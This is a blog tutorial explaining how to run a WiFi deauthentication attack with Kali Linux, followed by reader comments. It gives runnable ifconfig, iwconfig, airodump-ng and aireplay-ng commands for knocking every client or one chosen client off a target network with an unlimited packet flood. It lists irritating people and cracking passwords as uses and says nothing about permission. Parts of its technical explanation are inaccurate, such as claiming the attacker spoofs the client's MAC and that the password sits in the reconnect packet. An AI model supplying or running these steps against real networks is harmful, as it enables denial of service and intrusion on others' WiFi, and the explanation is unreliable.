WIFI DEAUTHENTICATION ATTACK USING KALI LINUX

In this article, I will explain a very useful attack lies under pre-connection wireless attacks category, which is known as WIFI Deauthentication attack, it is also known as WIFI deauth attack.

What is WiFi Deauthentication Attack?

WiFi Deauthentication Attack allows us to disconnect any device from any network, without connecting to that network and even without knowing the password of that network. It is a kind of ‘Denial-of-service’ attack, which is used to disconnect the devices connected to a WiFi network by continuously sending data packets or disassociate beacons to that Access Point. The attack targets the communication between the clients or users and the Access Point they are connected with.

Working of WiFi Deauthentication Attack

In this attack the attacker pretends to be client which is to be disconnected from the network by changing the MAC address to the client’s MAC address. And then sends some special deauthentication packets to the client as a spoofed Access Point and say that “you are not a authenticated user,validate yourself”. The process revokes the connection between the router and the client. After all of that, the Access Point and the user realize that they need to authenticate again. Now as the client has the key/password saved in the to-be-validated packet, attackers can capture that and later on they can decrypt that to compromise the network.

WiFi Deauthentication Attack
WiFi Deauthentication Attack

Denial Of Service Attack or DOS Attack

Denial Of Service Attack is a kind of cyber attack in which the aim of attacker is to make a system or resource unavailable to its users by allocating all the resources to himself. We can perform this attack by flooding the tons of requests which that resource will not able to handle. So its resources will get overloaded which will make the system or its services disable or unavailable for some time.

But, why to use deauthenticate?

It could be use in following cases:

1. Cracking Wi-Fi password

2. In case of Fake Access Point Attack

3. In information gathering to perform other greater attacks

4. To disconnect fake users

5. Just for fun or to Irritate someone.

How to deauthenticate devices in a Wi-Fi network?

To perform a deauthentication attack following are prerequisite

A system having Kali Linux

WiFi card which supports monitor mode

You can check this tutorial to install Kali Linux on virtual box: How to Install Kali Linux in Virtual box

How to perform wifi deauthentication attack.

There are number of tools available like ip manager, aireplay-ng etc.  to perform this attack. For this tutorial I am going to use aireplay-ng, because it is very simple to use.

Following are the steps to perform deauthentication attack on wifi.

  • First of all open up the terminal and put your Network Interface Card into monitor mode by typing the following commands one by one.

sudo ifconfig (interface name) down. In this case it is sudo ifconfig wlan0 down

disabling the wireless interface

sudo iwconfig (interface name) mode monitor. In this case it is sudo iwconfig wlan0 mode monitor

monitor mode for wifi dauthentication attack

sudo ifconfig (interface name) up. In this case it is sudo ifconfig wlan0 up

enabling the wireless interface
  • Now it will start scanning for the available networks by typing sudo airodump-ng <network interface name>. In this case it is sudo airodump-ng wlan0. Now, Wait until you find your target network and then press CTRL+C to stop the scanning.
Scanning networks
  • After that we need to monitor our target network specifically.

To do the same type

sudo airodump-ng -c (CH number) –bssid (BSSID of the network) (Network interface card). In this case it will be: sudo airodump-ng -c 3 –bssid EC:B3:13:C6:75:49 wlan0

monitoring network for wifi deauthennticating attack
monitoring network for wifi deauthennticating attack
  • If you want to deauthenticate all the devices in WiFi network

Type: sudo aireplay-ng -0 0 -a (BSSID of the targeted network) (Network interface name)

In this case it will be  aireplay-ng -0 0 -a EC:B3:13:C6:75:49 wlan0

command for dauthentication attack
wifi deauthentication attack running

If you want to deauthenticate specific client in a network

Type: sudo aireplay-ng -0 0 -a (MAC Address of the targeted network) -c (MAC Address of thethe device you want to deauthenticate) (Name of the interface)

Description of the command:

aireplay-ng is the name of the tool to perform de-authentication.

-0 is to tell tool to create the de-authentication packets

 0 will send infinite number of   de-authentication packets. You can also use small numbers of packets like 10 or 20 which is suitable for your case.

-a XX:XX:XX:XX:XX:XX specifies the router or access point

-c XX:XX:XX:XX:XX:XX points mac address of the client which we want to disconnect from the network.

wlan(x) is your Network interface card in monitor mode.

You can check Official repository for aircrack-ng suit here: aircrack-ng.

This is all about WiFi Deauthentication Attack using Kali Linux. Hope you learn something new with this tutorial. If you have any query or suggestion please mention that in comment box.

You may also like...

3,907 Responses

  1. RV Slideouts says:

    I want to to thank you for this very good read!! I definitely loved every little bit of it. I have you bookmarked to look at new stuff you postÖ

  2. This is the right site for anyone who wants to understand this topic. You understand so much its almost hard to argue with you (not that I actually would want toÖHaHa). You certainly put a new spin on a subject which has been discussed for years. Excellent stuff, just wonderful!

Leave a Reply

Your email address will not be published. Required fields are marked *